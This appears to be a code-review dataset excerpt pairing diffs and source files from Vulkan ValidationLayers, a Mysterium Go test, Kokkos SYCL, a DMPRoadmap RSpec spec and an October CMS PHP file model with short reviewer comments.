set skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyImageToBuffer-srcImage-00186", "vkCmdCopyImageToBuffer()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateBufferUsageFlags(dst_buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyImageToBuffer-dstBuffer-00191", "vkCmdCopyImageToBuffer()", "VK_BUFFER_USAGE_TRANSFER_DST_BIT"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_TRANSFER_SRC_BIT, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-srcImage-01998", "VUID-vkCmdCopyImageToBuffer-srcImage-01998"); } skip |= InsideRenderPass(cb_node, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-renderpass"); bool hit_error = false; const char *src_invalid_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyImageToBuffer-srcImageLayout-01397" : "VUID-vkCmdCopyImageToBuffer-srcImageLayout-00190"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].imageSubresource, "vkCmdCopyImageToBuffer()", "imageSubresource", i); skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].imageSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdCopyImageToBuffer()", src_invalid_layout_vuid, "VUID-vkCmdCopyImageToBuffer-srcImageLayout-00189", &hit_error); skip |= ValidateCopyBufferImageTransferGranularityRequirements( cb_node, src_image_state, &pRegions[i], i, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-imageOffset-01794"); skip |= ValidateImageMipLevel(cb_node, src_image_state, pRegions[i].imageSubresource.mipLevel, i, "vkCmdCopyImageToBuffer()", "imageSubresource", "VUID-vkCmdCopyImageToBuffer-imageSubresource-01703"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, pRegions[i].imageSubresource.baseArrayLayer, pRegions[i].imageSubresource.layerCount, i, "vkCmdCopyImageToBuffer()", "imageSubresource", "VUID-vkCmdCopyImageToBuffer-imageSubresource-01704"); } return skip; } void CoreChecks::PreCallRecordCmdCopyImageToBuffer(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_buffer_state = GetBufferState(dstBuffer); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, src_image_state, pRegions[i].imageSubresource, srcImageLayout); } // Update bindings between buffer/image and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingBuffer(cb_node, dst_buffer_state); } bool CoreChecks::PreCallValidateCmdCopyBufferToImage(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_image_state = GetImageState(dstImage); bool skip = ValidateBufferImageCopyData(regionCount, pRegions, dst_image_state, "vkCmdCopyBufferToImage"); // Validate command buffer state skip |= ValidateCmd(cb_node, CMD_COPYBUFFERTOIMAGE, "vkCmdCopyBufferToImage()"); // Command pool must support graphics, compute, or transfer operations auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool); VkQueueFlags queue_flags = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].queueFlags; if (0 == (queue_flags & (VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT | VK_QUEUE_TRANSFER_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->createInfo.commandPool), "VUID-vkCmdCopyBufferToImage-commandBuffer-cmdpool", "Cannot call vkCmdCopyBufferToImage() on a command buffer allocated from a pool without graphics, compute, " "or transfer capabilities.."); } skip |= ValidateImageBounds(report_data, dst_image_state, regionCount, pRegions, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-pRegions-00172"); skip |= ValidateBufferBounds(report_data, dst_image_state, src_buffer_state, regionCount, pRegions, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-pRegions-00171"); skip |= ValidateImageSampleCount(dst_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdCopyBufferToImage(): dstImage", "VUID-vkCmdCopyBufferToImage-dstImage-00179"); skip |= ValidateMemoryIsBoundToBuffer(src_buffer_state, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-srcBuffer-00176"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-dstImage-00178"); skip |= ValidateBufferUsageFlags(src_buffer_state, VK_BUFFER_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyBufferToImage-srcBuffer-00174", "vkCmdCopyBufferToImage()", "VK_BUFFER_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyBufferToImage-dstImage-00177", "vkCmdCopyBufferToImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-dstImage-01997", "VUID-vkCmdCopyBufferToImage-dstImage-01997"); } skip |= InsideRenderPass(cb_node, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-renderpass"); bool hit_error = false; const char *dst_invalid_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyBufferToImage-dstImageLayout-01396" : "VUID-vkCmdCopyBufferToImage-dstImageLayout-00181"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].imageSubresource, "vkCmdCopyBufferToImage()", "imageSubresource", i); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].imageSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdCopyBufferToImage()", dst_invalid_layout_vuid, "VUID-vkCmdCopyBufferToImage-dstImageLayout-00180", &hit_error); skip |= ValidateCopyBufferImageTransferGranularityRequirements( cb_node, dst_image_state, &pRegions[i], i, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-imageOffset-01793"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, pRegions[i].imageSubresource.mipLevel, i, "vkCmdCopyBufferToImage()", "imageSubresource", "VUID-vkCmdCopyBufferToImage-imageSubresource-01701"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, pRegions[i].imageSubresource.baseArrayLayer, pRegions[i].imageSubresource.layerCount, i, "vkCmdCopyBufferToImage()", "imageSubresource", "VUID-vkCmdCopyBufferToImage-imageSubresource-01702"); } return skip; } void CoreChecks::PreCallRecordCmdCopyBufferToImage(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_image_state = GetImageState(dstImage); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, dst_image_state, pRegions[i].imageSubresource, dstImageLayout); } AddCommandBufferBindingBuffer(cb_node, src_buffer_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } bool CoreChecks::PreCallValidateGetImageSubresourceLayout(VkDevice device, VkImage image, const VkImageSubresource *pSubresource, VkSubresourceLayout *pLayout) { bool skip = false; const VkImageAspectFlags sub_aspect = pSubresource->aspectMask; // The aspectMask member of pSubresource must only have a single bit set const int num_bits = sizeof(sub_aspect) * CHAR_BIT; std::bitset<num_bits> aspect_mask_bits(sub_aspect); if (aspect_mask_bits.count() != 1) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-aspectMask-00997", "vkGetImageSubresourceLayout(): VkImageSubresource.aspectMask must have exactly 1 bit set."); } IMAGE_STATE *image_entry = GetImageState(image); if (!image_entry) { return skip; } // image must have been created with tiling equal to VK_IMAGE_TILING_LINEAR if (image_entry->createInfo.tiling != VK_IMAGE_TILING_LINEAR) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-image-00996", "vkGetImageSubresourceLayout(): Image must have tiling of VK_IMAGE_TILING_LINEAR."); } // mipLevel must be less than the mipLevels specified in VkImageCreateInfo when the image was created if (pSubresource->mipLevel >= image_entry->createInfo.mipLevels) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-mipLevel-01716", "vkGetImageSubresourceLayout(): pSubresource.mipLevel (%d) must be less than %d.", pSubresource->mipLevel, image_entry->createInfo.mipLevels); } // arrayLayer must be less than the arrayLayers specified in VkImageCreateInfo when the image was created if (pSubresource->arrayLayer >= image_entry->createInfo.arrayLayers) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-arrayLayer-01717", "vkGetImageSubresourceLayout(): pSubresource.arrayLayer (%d) must be less than %d.", pSubresource->arrayLayer, image_entry->createInfo.arrayLayers); } // subresource's aspect must be compatible with image's format. const VkFormat img_format = image_entry->createInfo.format; if (FormatIsMultiplane(img_format)) { VkImageAspectFlags allowed_flags = (VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); const char *vuid = "VUID-vkGetImageSubresourceLayout-format-01581"; // 2-plane version if (FormatPlaneCount(img_format) > 2u) { allowed_flags |= VK_IMAGE_ASPECT_PLANE_2_BIT_KHR; vuid = "VUID-vkGetImageSubresourceLayout-format-01582"; // 3-plane version } if (sub_aspect != (sub_aspect & allowed_flags)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "vkGetImageSubresourceLayout(): For multi-planar images, VkImageSubresource.aspectMask (0x%" PRIx32 ") must be a single-plane specifier flag.", sub_aspect); } } else if (FormatIsColor(img_format)) { if (sub_aspect != VK_IMAGE_ASPECT_COLOR_BIT) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-VkImageSubresource-aspectMask-parameter", "vkGetImageSubresourceLayout(): For color formats, VkImageSubresource.aspectMask must be VK_IMAGE_ASPECT_COLOR."); } } else if (FormatIsDepthOrStencil(img_format)) { if ((sub_aspect != VK_IMAGE_ASPECT_DEPTH_BIT) && (sub_aspect != VK_IMAGE_ASPECT_STENCIL_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-VkImageSubresource-aspectMask-parameter", "vkGetImageSubresourceLayout(): For depth/stencil formats, VkImageSubresource.aspectMask must be " "either VK_IMAGE_ASPECT_DEPTH_BIT or VK_IMAGE_ASPECT_STENCIL_BIT."); } } if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { skip |= ValidateGetImageSubresourceLayoutANDROID(image); } return skip; }
1
10,434
FormatHandle isn't current typesafe w.r.t. requiring *VULKAN* handles... so this slipped through.
KhronosGroup-Vulkan-ValidationLayers
cpp
@@ -21,6 +21,7 @@ import ( "errors" "testing" + "github.com/asaskevich/EventBus" "github.com/stretchr/testify/assert" "github.com/mysteriumnetwork/node/identity"
1
/* * Copyright (C) 2019 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package service import ( "errors" "testing" "github.com/stretchr/testify/assert" "github.com/mysteriumnetwork/node/identity" "github.com/mysteriumnetwork/node/market" ) var ( serviceType = "the-very-awesome-test-service-type" ) func TestManager_StartRemovesServiceFromPoolIfServiceCrashes(t *testing.T) { registry := NewRegistry() mockCopy := *serviceMock mockCopy.onStartReturnError = errors.New("some error") registry.Register(serviceType, func(options Options) (Service, market.ServiceProposal, error) { return &mockCopy, proposalMock, nil }) discovery := mockDiscovery{} discoveryFactory := MockDiscoveryFactoryFunc(&discovery) manager := NewManager( registry, MockDialogWaiterFactory, MockDialogHandlerFactory, discoveryFactory, &MockNATPinger{}, ) _, err := manager.Start(identity.FromAddress(proposalMock.ProviderID), serviceType, struct{}{}) assert.Nil(t, err) discovery.Wait() assert.Len(t, manager.servicePool.List(), 0) } func TestManager_StartDoesNotCrashIfStoppedByUser(t *testing.T) { registry := NewRegistry() mockCopy := *serviceMock mockCopy.mockProcess = make(chan struct{}) registry.Register(serviceType, func(options Options) (Service, market.ServiceProposal, error) { return &mockCopy, proposalMock, nil }) discovery := mockDiscovery{} discoveryFactory := MockDiscoveryFactoryFunc(&discovery) manager := NewManager( registry, MockDialogWaiterFactory, MockDialogHandlerFactory, discoveryFactory, &MockNATPinger{}, ) id, err := manager.Start(identity.FromAddress(proposalMock.ProviderID), serviceType, struct{}{}) assert.Nil(t, err) err = manager.Stop(id) assert.Nil(t, err) discovery.Wait() assert.Len(t, manager.servicePool.List(), 0) }
1
14,018
What kind of dependency is here, I think we have own implementation of event wo external dependencies
mysteriumnetwork-node
go
@@ -125,6 +125,18 @@ SYCL::SYCLDevice::SYCLDevice(sycl::device d) : m_device(std::move(d)) {} SYCL::SYCLDevice::SYCLDevice(const sycl::device_selector& selector) : m_device(selector.select_device()) {} +SYCL::SYCLDevice::SYCLDevice(size_t id) { + std::vector<sycl::device> gpu_devices = + sycl::device::get_devices(sycl::info::device_type::gpu); + if (id >= gpu_devices.size()) { + std::stringstream error_message; + error_message << "Requested GPU with id " << id << " but only " + << gpu_devices.size() << " GPU(s) available!\n"; + Kokkos::abort(error_message.str().c_str()); + } + m_device = gpu_devices[id]; +} + sycl::device SYCL::SYCLDevice::get_device() const { return m_device; } void SYCL::impl_initialize(SYCL::SYCLDevice d) {
1
/* //@HEADER // ************************************************************************ // // Kokkos v. 3.0 // Copyright (2020) National Technology & Engineering // Solutions of Sandia, LLC (NTESS). // // Under the terms of Contract DE-NA0003525 with NTESS, // the U.S. Government retains certain rights in this software. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // 1. Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // // 2. Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // // 3. Neither the name of the Corporation nor the names of the // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY NTESS "AS IS" AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL NTESS OR THE // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS // SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Questions? Contact Christian R. Trott ([email protected]) // // ************************************************************************ //@HEADER */ #include <Kokkos_Concepts.hpp> #include <SYCL/Kokkos_SYCL_Instance.hpp> #include <Kokkos_SYCL.hpp> #include <Kokkos_HostSpace.hpp> #include <Kokkos_Serial.hpp> #include <Kokkos_Core.hpp> #include <impl/Kokkos_Error.hpp> namespace { template <typename C> struct Container { explicit Container(const C& c) : container(c) {} friend std::ostream& operator<<(std::ostream& os, const Container& that) { os << that.container.size(); for (const auto& v : that.container) { os << "\n\t" << v; } return os; } private: const C& container; }; } // namespace namespace Kokkos { namespace Impl { // forward-declaration int get_gpu(const InitArguments& args); } // namespace Impl namespace Experimental { SYCL::SYCL() : m_space_instance(&Impl::SYCLInternal::singleton(), [](Impl::SYCLInternal*) {}) { Impl::SYCLInternal::singleton().verify_is_initialized( "SYCL instance constructor"); } SYCL::SYCL(const sycl::queue& stream) : m_space_instance(new Impl::SYCLInternal, [](Impl::SYCLInternal* ptr) { ptr->finalize(); delete ptr; }) { Impl::SYCLInternal::singleton().verify_is_initialized( "SYCL instance constructor"); m_space_instance->initialize(stream); } int SYCL::concurrency() { return Impl::SYCLInternal::singleton().m_maxConcurrency; } const char* SYCL::name() { return "SYCL"; } bool SYCL::impl_is_initialized() { return Impl::SYCLInternal::singleton().is_initialized(); } void SYCL::impl_finalize() { Impl::SYCLInternal::singleton().finalize(); } void SYCL::fence() const { Impl::SYCLInternal::fence(*m_space_instance->m_queue); } void SYCL::impl_static_fence() { // guard accessing all_queues std::lock_guard<std::mutex> lock(Impl::SYCLInternal::mutex); for (auto& queue : Impl::SYCLInternal::all_queues) Impl::SYCLInternal::fence(**queue); } int SYCL::sycl_device() const { return impl_internal_space_instance()->m_syclDev; } SYCL::SYCLDevice::SYCLDevice(sycl::device d) : m_device(std::move(d)) {} SYCL::SYCLDevice::SYCLDevice(const sycl::device_selector& selector) : m_device(selector.select_device()) {} sycl::device SYCL::SYCLDevice::get_device() const { return m_device; } void SYCL::impl_initialize(SYCL::SYCLDevice d) { Impl::SYCLInternal::singleton().initialize(d.get_device()); } std::ostream& SYCL::SYCLDevice::info(std::ostream& os) const { using namespace sycl::info; return os << "Name: " << m_device.get_info<device::name>() << "\nDriver Version: " << m_device.get_info<device::driver_version>() << "\nIs Host: " << m_device.is_host() << "\nIs CPU: " << m_device.is_cpu() << "\nIs GPU: " << m_device.is_gpu() << "\nIs Accelerator: " << m_device.is_accelerator() << "\nVendor Id: " << m_device.get_info<device::vendor_id>() << "\nMax Compute Units: " << m_device.get_info<device::max_compute_units>() << "\nMax Work Item Dimensions: " << m_device.get_info<device::max_work_item_dimensions>() << "\nMax Work Group Size: " << m_device.get_info<device::max_work_group_size>() << "\nPreferred Vector Width Char: " << m_device.get_info<device::preferred_vector_width_char>() << "\nPreferred Vector Width Short: " << m_device.get_info<device::preferred_vector_width_short>() << "\nPreferred Vector Width Int: " << m_device.get_info<device::preferred_vector_width_int>() << "\nPreferred Vector Width Long: " << m_device.get_info<device::preferred_vector_width_long>() << "\nPreferred Vector Width Float: " << m_device.get_info<device::preferred_vector_width_float>() << "\nPreferred Vector Width Double: " << m_device.get_info<device::preferred_vector_width_double>() << "\nPreferred Vector Width Half: " << m_device.get_info<device::preferred_vector_width_half>() << "\nNative Vector Width Char: " << m_device.get_info<device::native_vector_width_char>() << "\nNative Vector Width Short: " << m_device.get_info<device::native_vector_width_short>() << "\nNative Vector Width Int: " << m_device.get_info<device::native_vector_width_int>() << "\nNative Vector Width Long: " << m_device.get_info<device::native_vector_width_long>() << "\nNative Vector Width Float: " << m_device.get_info<device::native_vector_width_float>() << "\nNative Vector Width Double: " << m_device.get_info<device::native_vector_width_double>() << "\nNative Vector Width Half: " << m_device.get_info<device::native_vector_width_half>() << "\nAddress Bits: " << m_device.get_info<device::address_bits>() << "\nImage Support: " << m_device.get_info<device::image_support>() << "\nMax Mem Alloc Size: " << m_device.get_info<device::max_mem_alloc_size>() << "\nMax Read Image Args: " << m_device.get_info<device::max_read_image_args>() << "\nImage2d Max Width: " << m_device.get_info<device::image2d_max_width>() << "\nImage2d Max Height: " << m_device.get_info<device::image2d_max_height>() << "\nImage3d Max Width: " << m_device.get_info<device::image3d_max_width>() << "\nImage3d Max Height: " << m_device.get_info<device::image3d_max_height>() << "\nImage3d Max Depth: " << m_device.get_info<device::image3d_max_depth>() << "\nImage Max Buffer Size: " << m_device.get_info<device::image_max_buffer_size>() << "\nImage Max Array Size: " << m_device.get_info<device::image_max_array_size>() << "\nMax Samplers: " << m_device.get_info<device::max_samplers>() << "\nMax Parameter Size: " << m_device.get_info<device::max_parameter_size>() << "\nMem Base Addr Align: " << m_device.get_info<device::mem_base_addr_align>() << "\nGlobal Cache Mem Line Size: " << m_device.get_info<device::global_mem_cache_line_size>() << "\nGlobal Mem Cache Size: " << m_device.get_info<device::global_mem_cache_size>() << "\nGlobal Mem Size: " << m_device.get_info<device::global_mem_size>() << "\nMax Constant Buffer Size: " << m_device.get_info<device::max_constant_buffer_size>() << "\nMax Constant Args: " << m_device.get_info<device::max_constant_args>() << "\nLocal Mem Size: " << m_device.get_info<device::local_mem_size>() << "\nError Correction Support: " << m_device.get_info<device::error_correction_support>() << "\nHost Unified Memory: " << m_device.get_info<device::host_unified_memory>() << "\nProfiling Timer Resolution: " << m_device.get_info<device::profiling_timer_resolution>() << "\nIs Endian Little: " << m_device.get_info<device::is_endian_little>() << "\nIs Available: " << m_device.get_info<device::is_available>() << "\nIs Compiler Available: " << m_device.get_info<device::is_compiler_available>() << "\nIs Linker Available: " << m_device.get_info<device::is_linker_available>() << "\nQueue Profiling: " << m_device.get_info<device::queue_profiling>() << "\nBuilt In Kernels: " << Container<std::vector<std::string>>( m_device.get_info<device::built_in_kernels>()) << "\nVendor: " << m_device.get_info<device::vendor>() << "\nProfile: " << m_device.get_info<device::profile>() << "\nVersion: " << m_device.get_info<device::version>() << "\nExtensions: " << Container<std::vector<std::string>>( m_device.get_info<device::extensions>()) << "\nPrintf Buffer Size: " << m_device.get_info<device::printf_buffer_size>() << "\nPreferred Interop User Sync: " << m_device.get_info<device::preferred_interop_user_sync>() << "\nPartition Max Sub Devices: " << m_device.get_info<device::partition_max_sub_devices>() << "\nReference Count: " << m_device.get_info<device::reference_count>() << '\n'; } namespace Impl { int g_sycl_space_factory_initialized = Kokkos::Impl::initialize_space_factory<SYCLSpaceInitializer>("170_SYCL"); void SYCLSpaceInitializer::initialize(const InitArguments& args) { int use_gpu = Kokkos::Impl::get_gpu(args); if (std::is_same<Kokkos::Experimental::SYCL, Kokkos::DefaultExecutionSpace>::value || 0 < use_gpu) { // FIXME_SYCL choose a specific device Kokkos::Experimental::SYCL::impl_initialize( Kokkos::Experimental::SYCL::SYCLDevice(sycl::default_selector())); } } void SYCLSpaceInitializer::finalize(const bool all_spaces) { if (std::is_same<Kokkos::Experimental::SYCL, Kokkos::DefaultExecutionSpace>::value || all_spaces) { if (Kokkos::Experimental::SYCL::impl_is_initialized()) Kokkos::Experimental::SYCL::impl_finalize(); } } void SYCLSpaceInitializer::fence() { Kokkos::Experimental::SYCL::impl_static_fence(); } void SYCLSpaceInitializer::print_configuration(std::ostream& msg, const bool /*detail*/) { msg << "Devices:" << std::endl; msg << " KOKKOS_ENABLE_SYCL: "; msg << "yes" << std::endl; msg << "\nRuntime Configuration:" << std::endl; // FIXME_SYCL not implemented std::abort(); // Experimental::SYCL::print_configuration(msg, detail); } } // namespace Impl } // namespace Experimental } // namespace Kokkos
1
28,509
Throw an exception instead
kokkos-kokkos
cpp
@@ -6,6 +6,9 @@ RSpec.describe Org::CreateLastMonthCreatedPlanService do let(:org) do FactoryBot.create(:org, created_at: DateTime.new(2018, 04, 01)) end + let(:org2) do + FactoryBot.create(:org) + end let(:template) do FactoryBot.create(:template, org: org) end
1
# frozen_string_literal: true require "rails_helper" RSpec.describe Org::CreateLastMonthCreatedPlanService do let(:org) do FactoryBot.create(:org, created_at: DateTime.new(2018, 04, 01)) end let(:template) do FactoryBot.create(:template, org: org) end let(:template2) do FactoryBot.create(:template, org: org) end let(:user1) do FactoryBot.create(:user, org: org) end let(:user2) do FactoryBot.create(:user, org: org) end let(:creator) { Role.access_values_for(:creator).first } let(:administrator) { Role.access_values_for(:administrator).first } before(:each) do plan = FactoryBot.create(:plan, template: template, created_at: Date.today.last_month) plan2 = FactoryBot.create(:plan, template: template, created_at: Date.today.last_month) plan3 = FactoryBot.create(:plan, template: template2, created_at: Date.today.last_month) FactoryBot.create(:role, :creator, plan: plan, user: user1) FactoryBot.create(:role, :administrator, plan: plan, user: user1) FactoryBot.create(:role, :creator, plan: plan2, user: user1) FactoryBot.create(:role, :creator, plan: plan3, user: user2) end describe ".call" do context "when org is passed" do it "generates counts from today's last month" do described_class.call(org) last_month_count = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).count expect(last_month_count).to eq(3) end it "generates counts by template from today's last month" do described_class.call(org) last_month_details = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).details expect(last_month_details).to match_array( "by_template" => [ { "name" => template.title, "count" => 2 }, { "name" => template2.title, "count" => 1 }, ] ) end it "monthly records are either created or updated" do described_class.call(org) last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org_id: org.id) expect(last_month).to have(1).items expect(last_month.first.count).to eq(3) new_plan = FactoryBot.create(:plan, template: template2, created_at: Date.today.last_month.end_of_month) FactoryBot.create(:role, :creator, plan: new_plan, user: user1) described_class.call(org) last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org_id: org.id) expect(last_month).to have(1).items expect(last_month.first.count).to eq(4) end end context "when no org is passed" do it "generates counts from today's last month" do Org.expects(:all).returns([org]) described_class.call last_month_count = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).count expect(last_month_count).to eq(3) end it "generates counts by template from today's last month" do Org.expects(:all).returns([org]) described_class.call last_month_details = StatCreatedPlan.find_by( date: Date.today.last_month.end_of_month, org_id: org.id).details expect(last_month_details).to match_array( "by_template" => [ { "name" => template.title, "count" => 2 }, { "name" => template2.title, "count" => 1 }, ] ) end it "monthly records are either created or updated" do Org.stubs(:all).returns([org]) described_class.call last_month = StatCreatedPlan.where( date: Date.today.last_month.end_of_month, org: org) expect(last_month).to have(1).items expect(last_month.first.count).to eq(3) new_plan = FactoryBot.create(:plan, template: template2, created_at: Date.today.last_month.end_of_month) FactoryBot.create(:role, :creator, plan: new_plan, user: user1) described_class.call last_month = StatCreatedPlan.where(date: Date.today.last_month.end_of_month, org: org) expect(last_month).to have(1).items expect(last_month.first.count).to eq(4) end end end end
1
18,910
we shouldn't need the `FactoryBot.` in these. Ok to leave for now since all of these specs have them. Can clean up later
DMPRoadmap-roadmap
rb
@@ -80,7 +80,7 @@ class File extends FileBase $uploadsPath .= '/protected'; } - return Url::asset($uploadsPath) . '/'; + return Storage::url($uploadsPath) . '/'; } /**
1
<?php namespace System\Models; use Url; use Config; use File as FileHelper; use Storage; use October\Rain\Database\Attach\File as FileBase; use Backend\Controllers\Files; /** * File attachment model * * @package october\system * @author Alexey Bobkov, Samuel Georges */ class File extends FileBase { /** * @var string The database table used by the model. */ protected $table = 'system_files'; /** * {@inheritDoc} */ public function getThumb($width, $height, $options = []) { $url = ''; $width = !empty($width) ? $width : 0; $height = !empty($height) ? $height : 0; if (!$this->isPublic() && class_exists(Files::class)) { $options = $this->getDefaultThumbOptions($options); // Ensure that the thumb exists first parent::getThumb($width, $height, $options); // Return the Files controller handler for the URL $url = Files::getThumbUrl($this, $width, $height, $options); } else { $url = parent::getThumb($width, $height, $options); } return $url; } /** * {@inheritDoc} */ public function getPath($fileName = null) { $url = ''; if (!$this->isPublic() && class_exists(Files::class)) { $url = Files::getDownloadUrl($this); } else { $url = parent::getPath($fileName); } return $url; } /** * If working with local storage, determine the absolute local path. */ protected function getLocalRootPath() { return Config::get('filesystems.disks.local.root', storage_path('app')); } /** * Define the public address for the storage path. */ public function getPublicPath() { $uploadsPath = Config::get('cms.storage.uploads.path', '/storage/app/uploads'); if ($this->isPublic()) { $uploadsPath .= '/public'; } else { $uploadsPath .= '/protected'; } return Url::asset($uploadsPath) . '/'; } /** * Define the internal storage path. */ public function getStorageDirectory() { $uploadsFolder = Config::get('cms.storage.uploads.folder'); if ($this->isPublic()) { return 